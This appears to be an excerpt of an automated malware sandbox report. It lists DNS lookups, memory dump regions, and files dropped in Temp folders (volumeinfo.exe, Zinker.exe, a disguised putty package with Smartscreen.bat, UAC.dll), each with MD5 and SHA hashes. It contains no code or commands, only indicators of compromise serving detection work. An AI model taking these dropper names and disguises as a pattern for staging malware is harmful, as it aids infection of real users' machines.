| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| N/A | 127.0.0.1:2404 | tcp |
Files
memory/2960-0-0x00007FF8598C3000-0x00007FF8598C5000-memory.dmp
memory/2960-1-0x0000000000F50000-0x0000000000F58000-memory.dmp
memory/2960-2-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
| MD5 | e817cc929fbc651c5bdab9e8cca0d9d9 |
| SHA1 | 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f |
| SHA256 | 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282 |
| SHA512 | a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f |
memory/3624-14-0x000000007514E000-0x000000007514F000-memory.dmp
memory/3624-15-0x0000000000E20000-0x0000000001060000-memory.dmp
memory/3624-16-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/3624-18-0x0000000006D30000-0x0000000006F4E000-memory.dmp
memory/3624-17-0x00000000059E0000-0x0000000005BFC000-memory.dmp
memory/3624-19-0x0000000007530000-0x0000000007AD4000-memory.dmp
memory/3624-20-0x0000000007020000-0x00000000070B2000-memory.dmp
memory/3624-21-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-22-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-29-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-56-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-58-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-76-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-84-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-82-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-80-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-78-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-74-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-72-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-70-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-68-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-66-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-64-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-62-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-60-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-54-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-52-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-50-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-48-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-46-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-38-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-36-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-34-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-32-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-30-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-44-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-42-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-26-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-40-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-24-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-4907-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/3624-4908-0x0000000007270000-0x00000000072C8000-memory.dmp
memory/3624-4909-0x00000000072D0000-0x000000000731C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\55.exe
| MD5 | 821f6662f6e721a43d020dc488a4a040 |
| SHA1 | d272ea0525684d2466ce0d58ad13a90e28bd1949 |
| SHA256 | c86b92d987b2f716cbdf2a772e55de445ce599ddeaecff6e47cef72ac61b0568 |
| SHA512 | 000b67d9127950369ba6cfb651d20efadcce5b23e1da62a68d20c594e8ad81702e26cc74f5e4eff927727faa0c2a303f5446acb1276a81a47b858a293775ee29 |
C:\Users\Admin\AppData\Local\Temp\a\3.exe
| MD5 | 2eb0ac82f49347944e4ef29cb53eca48 |
| SHA1 | c28c8c943d7ccc805cbc5cdc5f697d1ee3815b0f |
| SHA256 | 86c8da270e82ac4d2e27ac6ec56d7dd1df44d2bcb9ce22e008d9647fdba87243 |
| SHA512 | 6e9f916a6239b27ef4120ffd235409c9476cc49fdecbfff31fc5c15cb5769b39107ea4e1d93c61f60ec3df22ea5d09723a42d6287e7b52f77843357f04a8e327 |
C:\Users\Admin\AppData\Local\Temp\a\munqk.exe
| MD5 | dc7b784b8e4f9db78f88cb20dfbda030 |
| SHA1 | 6045e1d486dd095e43bf4f922500b15e05194719 |
| SHA256 | 92b62c8fbfb7f3002fbf04c225452381e4323834d6de26ec9b17d9691ef900dc |
| SHA512 | 13878e992cb3de1d13e9edd998e3043b692ca4e946bb1581d06943059657312158d70f36702f63fa602666576c6a9c49f9ca14ed0d16c40cabe30066e94c8535 |
C:\Users\Admin\AppData\Local\Temp\a\17.exe
| MD5 | 7ba50890ab7bfc1dd9e88c182a689fb9 |
| SHA1 | 33d4767c38e5586511a94ed03900495777bd4029 |
| SHA256 | 080aaaa296ddc41c2a448d2d39652608994dbe17019cd3fcb081d89ad3acad15 |
| SHA512 | 92a245d09c4c55c99915a94d762128f4ac3d6c2705d06d2b6c62243c654e9209233b28aa928f10e473672422673febd36281981826a4d361201403a3d56237bf |
C:\Users\Admin\AppData\Local\Temp\a\network.exe
| MD5 | a13c1ec24d6b087a6ac188b0fd254178 |
| SHA1 | fbe22171427327ec23240f5bc9896854110f360a |
| SHA256 | 7b7f9647dbc512c0f9857332b181991b1e8f6b1ab0634f31d8612ee483d2933f |
| SHA512 | 1ab541db748b8817e069d1ff73037e606f2913a57078e2080d60a1fbdb108d7d5b7698b10304ea271a48493432b20a14ac464fa584c0fa6bea27d7c78369acf5 |
memory/3248-4961-0x0000000002810000-0x0000000002846000-memory.dmp
memory/3248-4970-0x0000000005080000-0x00000000056A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\maikati.exe
| MD5 | bf0c635d0132b4318ae9dc4bc7269919 |
| SHA1 | 520708e247e52a5899143a768d36f0544828cadb |
| SHA256 | 97464eeb75791bf12ac3c78eeae121d066ef799e33cd4959f13eff4c257776d8 |
| SHA512 | 77b91bc40734cc0374b250c618360ca7e74c878e6715c60ad6627ce6e94cd9b6b5b92f8ccd52e592bf083903a17e6c8083f3f0783a721e902e57f39ce64f85d3 |
memory/3248-4984-0x0000000004FC0000-0x0000000005026000-memory.dmp
memory/3248-4983-0x0000000004E20000-0x0000000004E42000-memory.dmp
memory/3248-4985-0x00000000056B0000-0x0000000005716000-memory.dmp
memory/3248-4994-0x00000000057A0000-0x0000000005AF4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_33kbu4xy.pvi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3248-5005-0x0000000005E00000-0x0000000005E1E000-memory.dmp
memory/3148-5004-0x0000000000400000-0x0000000000412000-memory.dmp
memory/3248-5006-0x0000000005E30000-0x0000000005E7C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
| MD5 | b11913361b2d4c43c00c1969184050a8 |
| SHA1 | 8358fa3426e4136e0873a32f49f5f367770bad0a |
| SHA256 | de39bc2c5f18ae468501a573ee5cb9b22f2f608ec2fc51954b44d4549fac2a57 |
| SHA512 | 2d25c021ddf59a10b63c56d85a550e7454767444472f3e40662dda1e1dddeef551202253cf9137bf4054ed832cd59c53b66aba6d42361f044fe4e7b06bef2026 |
memory/3248-5019-0x00000000063E0000-0x0000000006412000-memory.dmp
memory/3248-5020-0x000000006F820000-0x000000006F86C000-memory.dmp
memory/3248-5031-0x0000000007000000-0x00000000070A3000-memory.dmp
memory/3248-5030-0x0000000006FE0000-0x0000000006FFE000-memory.dmp
memory/3248-5033-0x0000000007120000-0x000000000713A000-memory.dmp
memory/3248-5032-0x0000000007760000-0x0000000007DDA000-memory.dmp
memory/3248-5034-0x0000000007190000-0x000000000719A000-memory.dmp
memory/3248-5035-0x00000000073A0000-0x0000000007436000-memory.dmp
memory/3248-5036-0x0000000007320000-0x0000000007331000-memory.dmp
memory/3248-5037-0x0000000007350000-0x000000000735E000-memory.dmp
memory/3248-5038-0x0000000007360000-0x0000000007374000-memory.dmp
memory/3248-5039-0x0000000007460000-0x000000000747A000-memory.dmp
memory/3248-5040-0x0000000007440000-0x0000000007448000-memory.dmp
memory/2960-5052-0x00007FF8598C3000-0x00007FF8598C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
| MD5 | 66a5a529386533e25316942993772042 |
| SHA1 | 053d0d7f4cb6e3952e849f02bbfbdb4d39021146 |
| SHA256 | 713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94 |
| SHA512 | 9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a |
C:\Users\Admin\AppData\Local\Temp\nseC2B5.tmp\UAC.dll
| MD5 | adb29e6b186daa765dc750128649b63d |
| SHA1 | 160cbdc4cb0ac2c142d361df138c537aa7e708c9 |
| SHA256 | 2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08 |
| SHA512 | b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada |
C:\Users\Admin\AppData\Local\Temp\nseC2B5.tmp\nsExec.dll
| MD5 | 132e6153717a7f9710dcea4536f364cd |
| SHA1 | e39bc82c7602e6dd0797115c2bd12e872a5fb2ab |
| SHA256 | d29afce2588d8dd7bb94c00ca91cac0e85b80ffa6b221f5ffcb83a2497228eb2 |
| SHA512 | 9aeb0b3051ce07fb9f03dfee7cea4a5e423425e48cb538173bd2a167817f867a30bd4d27d07875f27ca00031745b24547030b7f146660b049fa717590f1c77e1 |
C:\Users\Admin\AppData\Local\Temp\putty\Smartscreen.bat
| MD5 | f6423b02fa9b2de5b162826b26c0dc56 |
| SHA1 | 01e7e79e6018c629ca11bc30f15a1a3e6988773e |
| SHA256 | 59f52a56309ecb5c9c256a88db12a60403e5b0a8c0b8c013e7f6c9c5c395ff83 |
| SHA512 | 5974e3a1bfe84719a2af614995f821d1c0a751b2ef2b39a3f6087c31dec609eb57d0824a28304e68365b75a0c7a3978aa28ed26c8f392976bd3337c1e8561459 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
| MD5 | 0c2564813f2b9fc088cfb6938214d3cb |
| SHA1 | cbb0bc2dfe83d38b9e4a8e47d182e6d7ee6a29b0 |
| SHA256 | 1043faf46b5a19cbe10410e01725b38caf0db7f36b73c68e103ebca8da2d18d2 |
| SHA512 | 06d4df2ed5d79c1d33ca06d977d936643c78139f484747bdfaac690b84f064620a6dc33014b0146acebce4e935688dc2a1445e7e2f830ec3b75e5e2dafa02ed1 |
memory/4484-5099-0x0000000006480000-0x00000000067D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 97cc569c9c7b2be6e68a9922c460c6c6 |
| SHA1 | 02e654678b61e1b4c3fe6d14f38240fa09b33627 |
| SHA256 | 752ca416ea5cd4635b6227bbb5c568d2bcf3c2e0e48c7809aa83e16cbb2dc7fd |
| SHA512 | 12e7e08dbc5af14633506a82591b806e0a10616a67f36d996e1c624efc84016366153019257d1d96284a07b5838b2cff776ae2709213ec528d4867d9b826e0f5 |
memory/4888-5101-0x000000001B7C0000-0x000000001BC8E000-memory.dmp
memory/4484-5102-0x0000000006970000-0x00000000069BC000-memory.dmp
memory/4888-5103-0x000000001B220000-0x000000001B2C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\New.exe
| MD5 | 384cc82bf0255c852430dc13e1069276 |
| SHA1 | 26467194c29d444e5373dfdde2ff2bca1c12ef9a |
| SHA256 | ba2567627674eada0b5462b673cdea4ed11a063174c87b775927db7e7d6ef99c |
| SHA512 | 7838ee81a8d13c3722627424270ac877081afc399be862ce9b1614a1df3c12f98066d28f2a9a81bcf626f14fe90d83ef8039cd679f40851f2d6d83c3839e73be |
memory/3688-5115-0x000001E4F8F50000-0x000001E4F8F5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
| MD5 | 2de14d82238bf5395e0b95e551ab8e00 |
| SHA1 | f9c7f00ad7c624d190e06cda3c5adf02bb207074 |
| SHA256 | aa9d5004f89fe3952e5ee0b148e6a36574d372bb5ffadae5733a7ee77127f8d4 |
| SHA512 | 9a5f2f781b52ea793021bf641a8be95f9611bfe936e9bd96978ec9066b4a7390b847f2e597cfd9ac69de9ac35b7238147538a23c3a27313d19c16258e2446f2a |
memory/2960-5125-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{D9B79AAE-9C59-4341-BA35-F85D0FF2FE33}.tmp\360P2SP.dll
| MD5 | fc1796add9491ee757e74e65cedd6ae7 |
| SHA1 | 603e87ab8cb45f62ecc7a9ef52d5dedd261ea812 |
| SHA256 | bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60 |
| SHA512 | 8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d |
C:\Users\Admin\AppData\Local\Temp\putty.zip
| MD5 | 188fbf5c7b5748e1f750be2bab44e0a0 |
| SHA1 | 525afccfc532830f71f068acfbf9ac49a1463539 |
| SHA256 | 14a23a25c21deba6f3a85d2e24085a95881302499bcdde6dc9a585fe46b9f370 |
| SHA512 | 62d6232ec09e266585f29c9fe335a6f02cfc0dbd8aa02545b0648eec7424aa25c4138cff49015073aede2a45506c056cbaa592cfc5d3a537313d9ee5bf1c6608 |
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
| MD5 | 7a9a33206f80078ba80f7a839cd92451 |
| SHA1 | 55447378c48561c35bad1317b58a34ee50c5072f |
| SHA256 | e53c379d95e95706c5a2c4d6cd609857368a3bf14f28d7e67f6e3f8dfce6d486 |
| SHA512 | 61873ed9b7616de998eff2ca90c6698cb0df87d181344fc6e02fd70fcd87fd8028cfdb7f606a3637514463982c161549729145118190e42b7f47365716f23aba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ea98e583ad99df195d29aa066204ab56 |
| SHA1 | f89398664af0179641aa0138b337097b617cb2db |
| SHA256 | a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6 |
| SHA512 | e109be3466e653e5d310b3e402e1626298b09205d223722a82344dd78504f3c33e1e24e8402a02f38cd2c9c50d96a303ce4846bea5a583423937ab018cd5782f |
\??\pipe\LOCAL\crashpad_1648_OHBPTTCBIUVHGZCH
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4f7152bc5a1a715ef481e37d1c791959 |
| SHA1 | c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7 |
| SHA256 | 704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc |
| SHA512 | 2e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c |
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
| MD5 | e6edb41c03bce3f822020878bde4e246 |
| SHA1 | 03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9 |
| SHA256 | 9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454 |
| SHA512 | 2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1 |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 184a117024f3789681894c67b36ce990 |
| SHA1 | c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e |
| SHA256 | b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e |
| SHA512 | 354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f35ebabea3c72e7e3592d8579466e809 |
| SHA1 | 5dba94f1ac3ff3dc53ec551045989688870911b3 |
| SHA256 | a4ecc4d400e6f657d6eaab20b2a1a65879266dec7ce55b1df04d89eddf6e4017 |
| SHA512 | 7f3fa07e231ea803ac400706a5be9c8678f8fba6c718335c35e13983b281488737037e663a65842888bf4bf18f50434c5bc0b401f80913fb23e02b27825a18ab |
memory/3688-5193-0x000001E4FB740000-0x000001E4FB7A8000-memory.dmp
memory/5500-5251-0x0000000000400000-0x0000000000416000-memory.dmp
memory/5280-5254-0x0000017964810000-0x0000017964832000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3156cafb50c37e6491b22084c60d4ce0 |
| SHA1 | c148c1217e3eed6ec3acaf8a9a020dc036d7d8f7 |
| SHA256 | a3eeca9076a1efaa46c5f63e4cd12fe84766a46f6c7013aa1f2f4bf361543010 |
| SHA512 | 968186a0a54ec1e107ea914f9de28cf677c6674093ea179eed03c0448fa19c40fbbb421fdc13101d49ab213760812ef7c792102d1b8e41421c8462c483bf3a06 |